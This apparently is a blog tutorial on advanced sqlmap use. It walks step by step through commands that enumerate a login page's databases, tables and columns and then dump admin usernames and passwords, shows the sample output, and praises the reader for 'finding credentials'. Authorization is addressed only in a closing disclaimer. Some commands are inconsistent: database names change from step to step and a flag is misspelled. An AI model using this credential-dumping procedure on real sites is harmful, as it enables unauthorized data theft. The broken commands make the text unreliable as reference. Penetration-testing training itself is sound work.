This course is complementary to [Hacking Beginner] SQLMAP : Learn SQL Injection ! Please read it before if you don’t know a lot about SQL Injection.
Here, I will try my best to teach you how to use SQLMAP at 3 different levels.
- Beginner
- Advanced [You are here !]
- Expert [Come soon…]
You should be aware that websites do not — generally speaking — use a single database for all their content.
For example, we can assume that they have one database for their article, another for their user, and another for the administrator account.
That why we should know what Databases we want to get !
Before, you Should have already done a command shown in the before course, otherwise it won’t work.
SQLMAP will remember what information we got and what payload to use to get what we asked for, in this case Database Names.
For this, please follow this command :
sqlmap -u "https://example.com/login?username=admin&password=azerty123" --dbs --thread 3What are all these options :
-u "WebSite": Specify which website we want to PenTest--dbs: Ask SQLMAP to search only Databases Names--thread=[1 to 10]: Simultaneous connection control number to increase connection speed. Be aware, higher is the number, greater is the chance of receiving errors — or being banned from the website! (Default : 1)
Take a coffee, be patient and wait for the result !
You should get a result like this :
[*] information_schema
[*] admins
[*] mysql
[*] performance_schema
Getting Table Names is very similar to getting Database Names !
We just need specify which Database we want to get Table Names from.
For this, please follow this command :
sqlmap -u "https://example.com/login?username=admin&password=azerty123" -D admin --tables --thread 3What are all these options :
-u "WebSite": Specify which website we want to PenTest-D: Specify which Database we want to get information from.--tables: Specify we only want Table Names.--thread=[1 to 10]: Simultaneous connection control number to increase connection speed. Be aware, higher is the number, greater is the chance of receiving errors — or being banned from the website! (Default : 1)
Take another one coffee, be patient and wait for the result !
You should get a result like this :
+------------------+
| admins_accounts |
| admins_notes |
+------------------+In this case, we got two tables !
One is Admins Notes, we don’t really care…
But the other one is Admins Accounts ! Now, we will try to get information from this one.
It’s exactly the same as before.
We just need specify which Database and Table Names we want Column Names from.
For this, please follow this command :
sqlmap -u "https://example.com/login?username=admin&password=azerty123" -D admins_accounts -T admin_accounts --columns --thread 3What are all these options :
-u "WebSite": Specify which website we want to PenTest-D: Specify which Database we want to get information from.-T: Specify which Table we want to get information from.--columns: Specify we only want Column Names.--thread=[1 to 10]: Simultaneous connection control number to increase connection speed. Be aware, higher is the number, greater is the chance of receiving errors — or being banned from the website! (Default : 1)
Don’t take another one coffee, be patient without one and wait for the result !
You should get a result like this :
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(256) |
| id | int(11) |
| username | varchar(256) |
+----------+--------------+
We are so close !
We just need specify where we want to take our information !
For this, please follow this command :
sqlmap -u "https://example.com/login?username=admin&password=azerty123" -D admin -T admin_accounts -C username,password --dump --thread 3What are all these options :
-u "WebSite": Specify which website we want to PenTest-D: Specify which Database we want to get information from.-T: Specify which Table we want to get information from.-C: Specify which Column we want to get information from.--dump: Specify we want to Dump(≈Download) information we get.--thread=[1 to 10]: Simultaneous connection control number to increase connection speed. Be aware, higher is the number, greater is the chance of receiving errors — or being banned from the website! (Default : 1)
Take a Tea — please don’t take an Earl Gray it’s disgusting — be patient and wait for the result !
You should get a result like this :
+------------+----------+
| password | username |
+------------+----------+
| christy | shameka |
+------------+----------+What a hacker ! You found credential by yourself ! Bravo
You don’t have an URL such as example.com/login?user=A&pass=B, and you only got something like example.com/login ? Isn’t a problem.
Every HTTP request can have information you can use for SQL Injection.
For that, please use a Reverse Proxy such as Burp Suite for seen HTTP Request. Like this :
POST /login HTTP/2
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: useless/info,application/xhtml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
username=ABC&password=123When you try to log into a website, you send information in an HTTP request. Use this information with --data, like this :
sqlmap -u "https://example.com/login?username=admin&password=azerty123" --data "username=ABC&password=123" (+ Add everything you want here)Difference between --risk and --level !
--level[1 to 5]
Level options indicate where SQLMAP should try to find a vulnerability.
- On level 1 (Default)
SQLMAP will try to find vulnerability only with GET and POST HTTP Request - On level 2
SQLMAP will try to find vulnerability also with HTTP Cookie. - On level 3
SQLMAP will try to find vulnerability also with HTTP User-Argent and Referer. - On level 4
Simply enable more payloads - On level 5
SQLMAP will try to find vulnerability also with HTTP Host.
--risk[1 to 3]
Level options indicate the dangerosity of these payload !
DON’T USE IT ON BUG BOUNTY
- On risk 1 (Default)
Least offensive. Safe to use. - On risk 2
Add heavy Time-Based Queries. It’s will change the SQL program to seriously slow down the Web Site. - On risk 3
Add “OR” injection. POTENTIALLY DESTRUCTIVE ! It’s will change the SQL program to break it.
USE IT ONLY ON PERSONAL DEVICE.
👏 Please, don’t forget to “Applaud” this, and don’t hesitate to follow me for more ! Thanks for reading !
If you don’t own cybersecurity, cybersecurity will own you.
The information provided in cybersecurity blogs is for informational purposes only. I not guarantee accuracy or endorse any actions taken based on the content. Use at your own risk.
